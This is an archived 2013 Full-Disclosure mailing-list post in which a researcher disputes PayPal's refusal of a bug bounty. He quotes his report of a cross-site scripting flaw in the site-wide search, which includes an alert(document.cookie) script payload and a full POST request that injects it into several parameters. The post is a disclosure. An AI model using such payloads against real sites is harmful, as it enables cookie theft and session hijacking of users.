| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 30 May 2013 00:38:16 +1000
From: Shubham Shah <shahshubham369@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: PayPal Bug Bounty Controversy - I found the XSS
first: They still didn't pay me
Heya everyone,
*On the 11th of May, 2013, I reported an XSS that affected the very same
field that Kugler reported, on the same domain of "paypal.com"* -
However, I too did not receive a bug bounty.
My name is Shubham Shah, also a security researcher. And coincidentally
but similarly to Robert Kugler. I too found a cross site scripting
vulnerability on PayPal's "sitewide-search" module. My exploit was
similar to his, it affected the same parameters except I had used an
alternate vector - after fiddling with the search system for some time.
The real controversy is however, I am *under 18 years old* and I, in the
past have received money from their program under my older siblings
PayPal account, with permission. When I reported the XSS pretty much the
same as Kugler reported, I was "not eligible for a bounty" because
"Another researcher already discovered the bug". Please take a look at
the attached emails and screenshots.
Here is what I sent to the Site Security team via their PGP portal:
====================================================
To Paypal Site Security Team,
Recently I have discovered an XSS vulnerability which affects the wide majority of Paypal.com/* This XSS vulnerability is a POST type, on the affected script "searchscr?cmd=_sitewide-search"
Affected domains:
https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search
(The * indicates any country code)
for example:
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
etc.
The XSS vector successfully executes on Internet Explorer and Firefox (newest builds). It does not execute on Chrome, but it is possible to create a custom vector to do so. If needed, I can create such a vector.
XSS Vector: '"<script >alert(document.cookie)</script> The bypass used is the ['"] in front of any HTML or script injection (without the square brackets)
This exploit has the capability of stealing a large number of user cookies in a short period of time with cookie stealers. If needed I can also provide a PoC for this. This can be done stealthily and would cause major mayhem if exploited!
Here is some proof of concept images:
http://pasteboard.co/2lU54Wuj.png (PNG file hosted on pasteboard.co) - document.cookie xss on firefox
Here is my personal HTTP Headers for making this exploit execute:
POSThttps://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search 1.1
Host:www.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 369
locale_val=en_AU&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&countstr_val=AU&serverame_val=www.paypal.com&searchResultUrlsCount_val=&queryString_acInput=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&queryString=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&buttonSearch=Search&beta_user=false&form_charset=UTF-8
Thank you for your time in reading this, Shubham Shah
====================================================
Screenshots to prove date of submission and actual message:
http://pbrd.co/18ugpSY <= Date submitted proof
http://pbrd.co/18ugFRZ <= Proof of message
On 05/13/2013 7:47 AM I got told by paypal that:
====================================================
Hi Shubham,
We regret to inform you that your bug submission was not eligible for a bounty for the following reason. Another researcher already discovered the bug.
Thank you for your participation. We take pride in keeping PayPal the safer place for online payment.
Thank you,
PayPal Security Team
====================================================
Once again, here are some screenshots:
http://pbrd.co/18uhtGD <= Proof of date I submitted it
http://pbrd.co/18uhMkI <= Proof of message - As I could not take a print
screen of the far right side, I included the barebones - print version
of the message - so others can verify the date I received the response.
Thanks for reading through,
I actually didn't get anything from PayPal similar to Robert, but I was
able to report the vulnerability 8 days earlier than Robert - and still
did not receive any acknowledgement.
Frankly, I was okay with it and moved on. I do not actually have much
against the bounty as I have been paid numerous times. PayPal has
honoured many of my vulnerabilities. However, I can tell you that
recently none of my security submissions have been honoured - they state
that all my newer submissions have been already reported - I have no
actual way of verifying if they have or not, so I just move on and
continue pentesting with spirit
Also, Robert, I am amazed by your work done with security regarding
Mozilla! They were awesome finds! Solid stuff man, I hope one day that I
can move onto learning more about application security.
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists